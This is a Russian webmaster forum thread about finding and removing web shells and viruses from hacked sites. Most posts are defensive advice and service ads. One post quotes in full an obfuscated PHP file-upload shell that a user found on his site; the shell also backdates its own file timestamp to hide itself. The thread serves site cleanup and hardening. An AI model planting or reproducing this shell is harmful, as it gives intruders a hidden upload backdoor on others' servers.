Общая тема о борьбе с шеллами и вирусами на сайте

draff
На сайте с 30.03.2010
Offline
65
#241

loed,

Смотри в логах access.log запросы POST

Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)
R
На сайте с 24.01.2008
Offline
180
#242
loed:
не помогает....

Скорей всего не поможет, съезжайте с хоста.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
loed
На сайте с 10.03.2007
Offline
188
#243
draff:
loed,
Смотри в логах access.log запросы POST

все я сдался лечить сам, отдал на лечение...

W0
На сайте с 20.04.2014
Offline
2
#244

Закажите аудит

Скрипты и программы на заказ icq: 686912527, jabber: w3bc0d3r@xmpp.jp
gregzem
На сайте с 22.11.2004
Offline
134
#245

Небольшая заметка о том, как неопытному вебмастеру понять, что его сайт взломали. И как быстро проверить сайт на взлом и эксплуатацию без сканирования.

http://www.revisium.com/kb/indirect-hack-detection.html

Антивирус для ISPmanager (https://revisium.com/ru/products/antivirus_for_ispmanager/) | Антивирус для Plesk (https://plesk.revisium.com) | Профессиональное лечение и защита сайтов (https://revisium.com/)
P
На сайте с 25.05.2014
Offline
15
#246
loed:
НЕ ОНО ЛИ?
<? $GLOBALS['_935675742_']=Array(base64_decode('aXNfdXBsb2FkZW' .'RfZm' .'lsZQ=='),base64_decode('bW92ZV91cGxv' .'Y' .'W' .'RlZ' .'F9ma' .'Wxl'),base64_decode('dG' .'ltZQ' .'=='),base64_decode('' .'dG91Y2g=')); ?><? function _1402832279($i){$a=Array('PGgxPkxPQUQ8L2gxPgo=','WW91ciBJUDog','UkVNT1RFX0FERFI=','PGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4K','PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGVuYW1lIj48YnI+IAo=','PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkxPQUQiPjxicj4K','PC9mb3JtPgo=','ZmlsZW5hbWU=','dG1wX25hbWU=','ZmlsZW5hbWU=','dG1wX25hbWU=','ZmlsZW5hbWU=','bmFtZQ==','ZmlsZW5hbWU=','bmFtZQ==','Tk8gRklMRQ==');return base64_decode($a[$i]);} ?><?php print _1402832279(0);echo _1402832279(1);echo $_SERVER[_1402832279(2)];echo _1402832279(3);echo _1402832279(4);echo _1402832279(5);echo _1402832279(6);if($GLOBALS['_935675742_'][0]($_FILES[_1402832279(7)][_1402832279(8)])){$GLOBALS['_935675742_'][1]($_FILES[_1402832279(9)][_1402832279(10)],$_FILES[_1402832279(11)][_1402832279(12)]);$_0=$_FILES[_1402832279(13)][_1402832279(14)];echo"<a href=\"$_0\">$_0</a>";}else{echo(_1402832279(15));}$_1=$_SERVER[SCRIPT_FILENAME];$_2=$GLOBALS['_935675742_'][2]()-round(0+20020720+20020720+20020720+20020720+20020720);$GLOBALS['_935675742_'][3]($_1,$_2); ?>
</body>
</html>

Такой код для ссылок используется в индексаторе товарища биллара http://forum.antichat.ru/thread389978.html

Пользуются им очень многие дорвейщики, естессно, которые не брезгуют работать на ломе.

Ищите теперь, куда инклудится этот файл. Бывает, что не в одном месте. Но чаще это футеры, хедеры.

JB
На сайте с 09.05.2014
Offline
239
#247

Нужно просто нe ставить нуллeды cms, нe cтавить сомнитeльныe плагины, ставить надёжныe пасворды на одминках и sql, как вам правильно сказали - права на папки и файлы. Нe хоститься у контор одноднeвок, или имeющих сомнитeльныe отзывы.

Ecли нe понимаeтe что и как там устроeно - закажитe спeциалиста с рeпутациeй и отзывами, чтобы чeловeк нe вызывал подозрeния. Спeциализирующeгося на лeчeнии таких проблeм. А сами нe трогайтe ничeго :)

RiDDi
На сайте с 06.06.2010
Offline
284
#248
gregzem:
Небольшая заметка о том, как неопытному вебмастеру понять, что его сайт взломали.

А нет небольшой заметки о том, как неопытному хирургу понять, что он отрезал не то? 😂

Вебмастер отдыхает на бережках морей. Заработок в интернете - дело техники.
P
На сайте с 25.05.2014
Offline
15
#249
RiDDi:
А нет небольшой заметки о том, как неопытному хирургу понять, что он отрезал не то? 😂

Сравнить с необрезанным :)

W
На сайте с 28.05.2011
Offline
54
#250

На заметку тем кто мучается с CHMOD, когда у вас сайт работает как надо и нет необходимости дополнительно где то менять права средствами php, то смело отключаем его в php.ini, в disable_functions, также можно и отключить touch это команда для исправления даты файла, при обнаружение взлома, это не даст злоумышленнику исправить права файла и поможет по дате проследить когда и где изменялись файлы или заливались... Если на папке расширенные права, то злоумышленнику не обязательно нужна команда правки прав, ему достаточно будет удалить ваш файлик и создать новый.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий